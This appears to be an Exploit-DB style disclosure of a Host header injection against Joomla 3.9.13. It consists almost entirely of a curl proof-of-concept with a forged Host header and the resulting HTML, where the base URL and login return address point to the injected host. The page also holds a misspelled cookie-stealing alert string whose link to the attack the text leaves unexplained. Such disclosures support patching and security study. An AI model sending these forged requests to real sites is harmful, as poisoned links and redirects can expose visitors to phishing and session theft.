Share
# Exploit Title: Joomla 3.9.13 - 'Host' Header Injection  
# Author: Pablo Santiago  
# Date: 2019-11-12  
# Vendor Homepage: https://www.joomla.org/  
# Source: https://downloads.joomla.org/cms/joomla3/3-9-13/Joomla_3-9-13-Stable-Full_Package.zip?format=zip  
# Version: 3.9.13  
# CVE : N/A  
# Tested on: Windows 10  
  
#PoC  
  
curl http://localhost/joomla/ -H "Host: exploit-db.com"  
  
<!DOCTYPE html>  
<html lang="en-gb" dir="ltr">  
<head>  
<meta name="viewport" content="width=device-width, initial-scale=1.0" />  
<meta charset="utf-8" />  
<base href="http://exploit-db.com/joomla/" />  
<meta name="description" content="javacript:alert(document.cookie)" />  
<meta name="generator" content="Joomla! - Open Source Content  
Management" />  
<title>Home</title>  
<link href="/joomla/index.php?format=feed&type=rss"  
rel="alternate" type="application/rss+xml" title="RSS 2.0" />  
<link href="/joomla/index.php?format=feed&type=atom"  
rel="alternate" type="application/atom+xml" title="Atom 1.0" />  
<link href="/joomla/templates/protostar/favicon.ico"  
rel="shortcut icon" type="image/vnd.microsoft.icon" />  
<link href="/joomla/templates/protostar/css/template.css?190197408a83fd286a9c42640a0f2f22"  
rel="stylesheet" />  
<link href="https://fonts.googleapis.com/css?family=Open+Sans"  
rel="stylesheet" />  
<style>  
  
h1, h2, h3, h4, h5, h6, .site-title {  
font-family: 'Open Sans', sans-serif;  
}  
</style>  
<script type="application/json" class="joomla-script-options  
new">{"csrf.token":"d460ac322fbbb6ae67cc78034182d9e1","system.paths":{"root":"\/joomla","base":"\/joomla"},"system.keepalive":{"interval":840000,"uri":"\/joomla\/index.php\/component\/ajax\/?format=json"}}</script>  
<script  
src="/joomla/media/jui/js/jquery.min.js?190197408a83fd286a9c42640a0f2f22"></script>  
<script  
src="/joomla/media/jui/js/jquery-noconflict.js?190197408a83fd286a9c42640a0f2f22"></script>  
<script  
src="/joomla/media/jui/js/jquery-migrate.min.js?190197408a83fd286a9c42640a0f2f22"></script>  
<script  
src="/joomla/media/system/js/caption.js?190197408a83fd286a9c42640a0f2f22"></script>  
<script  
src="/joomla/media/jui/js/bootstrap.min.js?190197408a83fd286a9c42640a0f2f22"></script>  
<script  
src="/joomla/templates/protostar/js/template.js?190197408a83fd286a9c42640a0f2f22"></script>  
<!--[if lt IE 9]><script  
src="/joomla/media/jui/js/html5.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->  
<script  
src="/joomla/media/system/js/core.js?190197408a83fd286a9c42640a0f2f22"></script>  
<!--[if lt IE 9]><script  
src="/joomla/media/system/js/polyfill.event.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->  
<script  
src="/joomla/media/system/js/keepalive.js?190197408a83fd286a9c42640a0f2f22"></script>  
<script>  
jQuery(window).on('load', function() {  
new JCaption('img.caption');  
jQuery(function($){ initTooltips(); $("body").on("subform-row-add",  
initTooltips); function initTooltips (event, container) { container =  
container || document;$(container).find(".hasTooltip").tooltip({"html":  
true,"container": "body"});} });  
</script>  
  
</head>  
<body class="site com_content view-featured no-layout no-task itemid-101">  
<!-- Body -->  
<div class="body" id="top">  
<div class="container">  
<!-- Header -->  
<header class="header" role="banner">  
<div class="header-inner clearfix">  
<a class="brand pull-left"  
href="/joomla/">  
<span  
class="site-title"  
title="javacript:alert(document.cookie)">javacript:alert(document.cookie)</span>  
  
</a>  
<div class="header-search pull-right">  
  
</div>  
</div>  
</header>  
  
<div class="row-fluid">  
<main  
id="content" role="main" class="span9">  
<!-- Begin Content -->  
  
<div id="system-message-container">  
</div>  
  
<div class="blog-featured"  
itemscope itemtype="https://schema.org/Blog">  
<div class="page-header">  
<h1>  
Home </h1>  
</div>  
  
  
  
</div>  
  
<div class="clearfix"></div>  
<div aria-label="breadcrumbs"  
role="navigation">  
<ul itemscope itemtype="https://schema.org/BreadcrumbList"  
class="breadcrumb">  
<li>  
You are here:   
</li>  
  
<li  
itemprop="itemListElement" itemscope  
itemtype="https://schema.org/ListItem" class="active">  
<span itemprop="name">  
Home  
</span>  
<meta itemprop="position" content="1">  
</li>  
</ul>  
</div>  
  
<!-- End Content -->  
</main>  
  
<div id="aside" class="span3">  
<!-- Begin Right Sidebar -->  
<div class="well  
_menu"><h3 class="page-header">Main Menu</h3><ul class="nav menu  
mod-list">  
<li class="item-101 default current active"><a  
href="/joomla/index.php" >Home</a></li></ul>  
</div><div class="well "><h3 class="page-header">Login Form</h3><form  
action="/joomla/index.php" method="post" id="login-form"  
class="form-inline">  
<div class="userdata">  
<div id="form-login-username" class="control-group">  
<div class="controls">  
  
<div class="input-prepend">  
<span class="add-on">  
<span  
class="icon-user hasTooltip" title="Username"></span>  
<label  
for="modlgn-username" class="element-invisible">Username</label>  
</span>  
<input  
id="modlgn-username" type="text" name="username" class="input-small"  
tabindex="0" size="18" placeholder="Username" />  
</div>  
</div>  
</div>  
<div id="form-login-password" class="control-group">  
<div class="controls">  
  
<div class="input-prepend">  
<span class="add-on">  
<span  
class="icon-lock hasTooltip" title="Password">  
</span>  
<label  
for="modlgn-passwd" class="element-invisible">Password  
</label>  
</span>  
<input  
id="modlgn-passwd" type="password" name="password" class="input-small"  
tabindex="0" size="18" placeholder="Password" />  
</div>  
</div>  
</div>  
<div  
id="form-login-remember" class="control-group checkbox">  
<label for="modlgn-remember"  
class="control-label">Remember Me</label> <input id="modlgn-remember"  
type="checkbox" name="remember" class="inputbox" value="yes"/>  
</div>  
<div id="form-login-submit"  
class="control-group">  
<div class="controls">  
<button type="submit" tabindex="0"  
name="Submit" class="btn btn-primary login-button">Log in</button>  
</div>  
</div>  
<ul class="unstyled">  
<li>  
<a  
href="/joomla/index.php/component/users/?view=remind&Itemid=101">  
Forgot your username?</a>  
</li>  
<li>  
<a  
href="/joomla/index.php/component/users/?view=reset&Itemid=101">  
Forgot your password?</a>  
</li>  
</ul>  
<input type="hidden" name="option" value="com_users" />  
<input type="hidden" name="task" value="user.login" />  
<input type="hidden" name="return"  
value="aHR0cDovL2V4cGxvaXQtZGIuY29tL2pvb21sYS8=" />  
<input type="hidden"  
name="d460ac322fbbb6ae67cc78034182d9e1" value="1" /> </div>  
</form>  
</div>  
<!-- End Right Sidebar -->  
</div>  
</div>  
</div>  
</div>  
<!-- Footer -->  
<footer class="footer" role="contentinfo">  
<div class="container">  
<hr />  
  
<p class="pull-right">  
<a href="#top" id="back-top">  
Back to Top  
</a>  
</p>  
<p>  
&copy; 2019  
javacript:alert(document.cookie) </p>  
</div>  
</footer>  
  
</body>  
</html>  
  
#PoC Visual  
https://imgur.com/a/IgO4ZxI